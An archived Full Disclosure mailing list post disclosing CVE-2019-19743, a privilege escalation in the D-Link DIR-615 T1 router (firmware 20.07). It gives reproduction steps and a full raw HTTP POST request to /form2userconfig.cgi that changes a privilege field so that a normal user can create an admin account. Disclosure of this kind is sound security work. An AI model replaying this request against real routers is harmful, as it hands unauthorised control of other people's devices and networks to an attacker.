lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 16 Dec 2019 20:37:39 +0530 From: Sanyam Chawla <infosecsanyam@...il.com> To: fulldisclosure@...lists.org Subject: [FD] D-Link DIR-615 — Vertical Prviliege Escalation ###################################################################################### # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation # Date: 10.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19743 ####################################################################################### Reproduction Steps: 1. Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1] 2. Go to the Maintenance page and click on Admin on the left panel. 3. There is an option to create a user and by default, it shows only user accounts. <https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG> 4. Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id (1 to 2) with burp suite. Privilege Escalation Post Request POST /form2userconfig.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/userconfig.htm Cookie: SessionID= Upgrade-Insecure-Requests: 1 username=ptguy&*privilege=2*&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send 5. Now log in with newly created root (ptguy) user. You have all administrator rights. Please let me know if any other information required from my side for this vulnerability. Best Regards, Sanyam Chawla _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists